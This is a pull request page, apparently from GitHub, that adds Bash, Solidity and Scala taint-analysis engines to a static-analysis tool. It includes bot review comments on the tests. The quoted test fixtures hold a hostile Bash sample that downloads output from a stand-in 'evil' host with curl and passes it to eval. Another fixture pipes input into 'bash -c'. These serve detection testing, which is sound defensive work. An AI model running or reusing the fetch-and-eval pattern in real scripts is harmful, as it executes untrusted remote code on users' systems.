feat(taint): Scala/Solidity/Bash taint engines (→ 92.4%)#530
Conversation
Wire three new language taint engines into the Semgrep taint bridge, mirroring the Ruby/PHP/C# templates and the shared taint_engine framework. - bash_taint: command / command-substitution flow (top-level + functions); curl/jq/cat sources -> eval/bash -c/sh -c sinks; realpath sanitizer. - solidity_taint: function-parameter (address) sources -> delegatecall (tainted receiver) and selfdestruct/suicide (tainted arg) sinks. - scala_taint: request-parameter sources -> SQL string-building (infix / interpolated) and method-name (eval/execute/append/overrideSql) sinks. Bridge (semgrep_taint.rs): thread Language through the pattern compiler; add compile_bash_pattern (shell command -> Call matcher) and a function-signature source compiler (-> any-parameter seed) for Solidity/ Scala; strip Solidity statement-terminating `;`. Add to_*_spec/matcher, TaintFindingView::from_*, dispatch arms, and scala/solidity/bash/sh/shell/ sol language detection. Update registry_coverage taint_language_supported. Each engine has unit tests plus BRIDGE-LEVEL tests (parse_taint_rule -> Compiled -> check on a real vulnerable fixture fires; a safe near-miss does not), using the actual registry rule YAML shapes. Registry coverage: 92.0% (1972) -> 92.4% (1982). Unblocks all 5 scala and 3 bash taint rules and 2 of 3 solidity (delegatecall, selfdestruct). The remaining basic-arithmetic-underflow is co-blocked: its source is a pattern-inside-only block that yields no expressible matcher.
|
Caution Review failedThe pull request is closed. ℹ️ Recent review info⚙️ Run configurationConfiguration used: defaults Review profile: CHILL Plan: Pro Plus Run ID: 📒 Files selected for processing (7)
📝 WalkthroughWalkthroughThree new intraprocedural, flow-insensitive taint analysis engines are added for Bash, Solidity, and Scala. Each engine is registered as a public module, integrated into the Semgrep YAML taint bridge ( ChangesBash / Solidity / Scala Taint Engine Addition
Sequence Diagram(s)sequenceDiagram
rect rgba(173, 216, 230, 0.5)
Note over parse_taint_rule,compile_pattern: YAML Rule Parsing
participant parse_taint_rule
participant compile_matcher_list
participant compile_pattern
parse_taint_rule->>compile_matcher_list: pattern-sources/sinks/sanitizers + lang
compile_matcher_list->>compile_pattern: pattern text, role, lang
compile_pattern-->>compile_matcher_list: GenericMatcher::Call or ParamName
compile_matcher_list-->>parse_taint_rule: GenericSpec
end
rect rgba(144, 238, 144, 0.5)
Note over check_with_context,scala_taint: Runtime Dispatch
participant check_with_context
participant bash_taint
participant solidity_taint
participant scala_taint
check_with_context->>bash_taint: GenericSpec→TaintSpec, analyze_tree (Bash AST)
bash_taint-->>check_with_context: Vec<TaintFinding>
check_with_context->>solidity_taint: GenericSpec→TaintSpec, analyze_tree (Solidity AST)
solidity_taint-->>check_with_context: Vec<TaintFinding>
check_with_context->>scala_taint: GenericSpec→TaintSpec, analyze_tree (Scala AST)
scala_taint-->>check_with_context: Vec<TaintFinding>
end
Estimated code review effort🎯 5 (Critical) | ⏱️ ~120 minutes Possibly related PRs
Poem
✨ Finishing Touches📝 Generate docstrings
🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
| } | ||
|
|
||
| fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> { | ||
| let tree = parse_file(src, Language::Bash).expect("parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| use crate::Language; | ||
|
|
||
| fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> { | ||
| let tree = parse_file(src, Language::Scala).expect("parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| assert_eq!(rule.lang, Language::Bash); | ||
|
|
||
| let src = "out=$(curl http://evil)\neval \"$out\"\n"; | ||
| let tree = parse_file(src, Language::Bash).expect("bash fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| ); | ||
|
|
||
| let src = "out=\"ls -la\"\neval \"$out\"\n"; | ||
| let tree = parse_file(src, Language::Bash).expect("bash fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| ); | ||
|
|
||
| let src = "data=$(cat | jq -r '.path')\nbash -c \"$data\"\n"; | ||
| let tree = parse_file(src, Language::Bash).expect("bash fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| } | ||
| } | ||
| "#; | ||
| let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| } | ||
| } | ||
| "#; | ||
| let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| } | ||
| } | ||
| "#; | ||
| let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| } | ||
| } | ||
| "#; | ||
| let tree = parse_file(src, Language::Scala).expect("scala fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| } | ||
| } | ||
| "#; | ||
| let tree = parse_file(src, Language::Scala).expect("scala fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| } | ||
| } | ||
| "#; | ||
| let tree = parse_file(src, Language::Scala).expect("scala fixture should parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
| use crate::Language; | ||
|
|
||
| fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> { | ||
| let tree = parse_file(src, Language::Solidity).expect("parse"); |
There was a problem hiding this comment.
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
Taint engines for Scala, Solidity, Bash → load rate 92.0% → 92.4%
Adds three new
mode: taintengines, mirroring the existing ruby/php/csharp engines on the sharedtaint_engine.rsframework. Their tree-sitter grammars were already wired (rounds 7-8); these rules were blocked solely on a missing taint engine.pattern-inside-only source, not language-blocked — honest)All three
mode: taint (unsupported language: …)buckets → 0.Results (independently re-measured)
Verification (re-run on the branch)
registry_coverage→ 92.4% / all three buckets gone ✓cargo test1105 passed, 0 failed · clippy-D warningsclean ·fmt --checkclean · baseline + Cargo.toml untouched ✓parse_taint_rule→ compiledrule.check()— the exactscanner.rs:74per-file entrypoint, NOTanalyze_tree): curl-eval/scala-SQLi/delegatecall/selfdestruct fire on real registry rule patterns; safe near-misses (literal-only concat, delegatecall-to-self, clean eval) don't. API surface confirmed identical to the ruby template.Summary by CodeRabbit
New Features
Documentation